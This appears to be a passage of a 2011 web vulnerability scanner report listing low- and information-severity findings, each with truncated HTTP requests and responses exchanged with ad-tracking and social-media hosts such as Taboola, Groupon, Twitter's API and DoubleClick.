GET /usatoday/log/2/visible Host: trc.taboolasyndication Proxy-Connection: keep-alive Referer: http://www.usatoday.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: taboola_session_id=v1 |
HTTP/1.1 302 Found Date: Mon, 09 May 2011 15:37:15 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc Cache-Control: no-cache Pragma: no-cache Location: http://a4032a35ca0f6da7a Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 0 Set-Cookie: taboola_rii=41587102 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /users |
POST /users HTTP/1.1 Host: www.groupon.com Connection: keep-alive Referer: .a3f79e46c4377f02c/ Cache-Control: max-age=0 Origin: https://www.groupon.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare Content-Length: 231 authenticity_token ...[SNIP]... |
HTTP/1.1 302 Moved Temporarily Server: EdgePrismSSL Date: Mon, 09 May 2011 15:36:59 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: _tpref=.a3f79e46c4377f02c Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:59 GMT Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _thepoint=8dd18fc853 Status: 302 Location: https://www.groupon.com X-Runtime: 72 Cache-Control: no-cache Content-Length: 108 <html><body>You are being <a href="https://www.groupon |
Severity: | Low |
Confidence: | Firm |
Host: | http://api.twitter.com |
Path: | /1/wvuefox8/lists/wvue |
GET /1/wvuefox8/lists/wvue Host: api.twitter.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=13031416680 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:41 GMT Server: hi Status: 200 OK X-Transaction: 1304955581-43234-51315 X-RateLimit-Limit: 150 ETag: "d640a63e6d4c8f178a6 Last-Modified: Mon, 09 May 2011 15:39:41 GMT X-RateLimit-Remaining: 148 X-Runtime: 0.04042 X-Transaction-Mask: a6183ffa5f8ca943ff1b Content-Type: application/json; charset=utf-8 Pragma: no-cache X-RateLimit-Class: api X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-MID: e74652c3d440cadd935e X-RateLimit-Reset: 1304959140 Set-Cookie: original_referer Set-Cookie: _twitter_sess=BAh7CD Vary: Accept-Encoding Connection: close Content-Length: 35250 TWTR.Widget.receiveC ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://t.mookie1.com |
Path: | /t/v1/imp |
GET /t/v1/imp?migAgencyId=234 Host: t.mookie1.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/CNT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:02 GMT Server: Apache/2.0.52 (Red Hat) Cache-Control: no-cache Pragma: no-cache P3P: CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 15:39:02 GMT; domain=.mookie1.com Set-Cookie: session=1304955542 Content-Length: 35 Content-Type: image/gif GIF87a.............,..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:58 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_13277 Content-Length: 6659 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://a1.interclick.com |
Path: | /ColDta.aspx |
GET /ColDta.aspx HTTP/1.1 Host: a1.interclick.com Proxy-Connection: keep-alive Referer: http://cdn.interclick.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: T=1; uid=u=c3e2564e-78bb-4fe5 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 43 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: tpd=e20=1305834684215&e90 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Mon, 09 May 2011 15:38:39 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.amgdgt.com |
Path: | /ads/ |
GET /ads/?t=i&f=j&p=5112&pl Host: ad.amgdgt.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ID=AAAAAQAU6fB5bLIqJ |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUVGIL2vn32 Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset Content-Length: 3928 Date: Mon, 09 May 2011 15:35:17 GMT _289669_amg_acamp_id _289669_amg_pcamp_id _289669_amg_location_id _289669_amg_creative_id _289669_amg_loaded=true; var _amg_289669_content=' ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clk |
GET /clk;231082307;55315497;e Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://share.meebo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.groupon.com Set-Cookie: id=22fba3001601008d P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Mon, 09 May 2011 15:35:33 GMT Server: GFE/2.0 Content-Type: text/html |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.pointroll.com |
Path: | /PortalServe/ |
GET /PortalServe/?pid Host: ads.pointroll.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PRID=B313D3CD-2147-4ACC |
HTTP/1.1 200 OK Connection: close Date: Mon, 09 May 2011 15:35:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache Content-type: text/html Content-length: 4400 Set-Cookie:PRvt Set-Cookie:PRgo Set-Cookie:PRimp=D9A20400 Set-Cookie:PRca=|AKLC Set-Cookie:PRcp=|AKLCAA2c Set-Cookie:PRpl=|FKqE:1 Set-Cookie:PRcr=|GKwo:1 Set-Cookie:PRpc=|FKqEGKwo var prwin=window;if(!prwin ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.revsci.net |
Path: | /adserver/ako |
GET /adserver/ako?record Host: ads.revsci.net Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=8e1e11639864 |